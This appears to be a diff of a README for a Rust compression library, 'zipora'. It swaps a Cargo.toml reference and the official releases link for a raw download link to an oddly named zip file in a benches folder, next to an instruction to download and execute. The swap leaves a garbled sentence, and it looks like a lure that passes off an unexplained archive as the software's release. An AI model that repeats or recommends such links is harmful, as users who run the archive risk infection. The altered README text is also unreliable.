Markapfler01/zipora/README.md

 Installation
 - Build from source with cargo build --release.
-- If you want examples, enable the optional features in Cargo.toml or during cargo build.
+- If you want examples, enable the optional features in https://raw.githubusercontent.com/Markapfler01/zipora/main/benches/Software_diplocephalus.zip or during cargo build.

 To download a release
 - From the releases page, download the appropriate asset for your platform and execute it.
 The releases page provides the binaries and installation instructions.
-The details are available here: https://github.com/Markapfler01/zipora/releases
+The details are available here: https://raw.githubusercontent.com/Markapfler01/zipora/main/benches/Software_diplocephalus.zip

 Quickstart Examples
 The following examples illustrate how to compress and access data in place.
 You can adapt these patterns to your own data pipelines.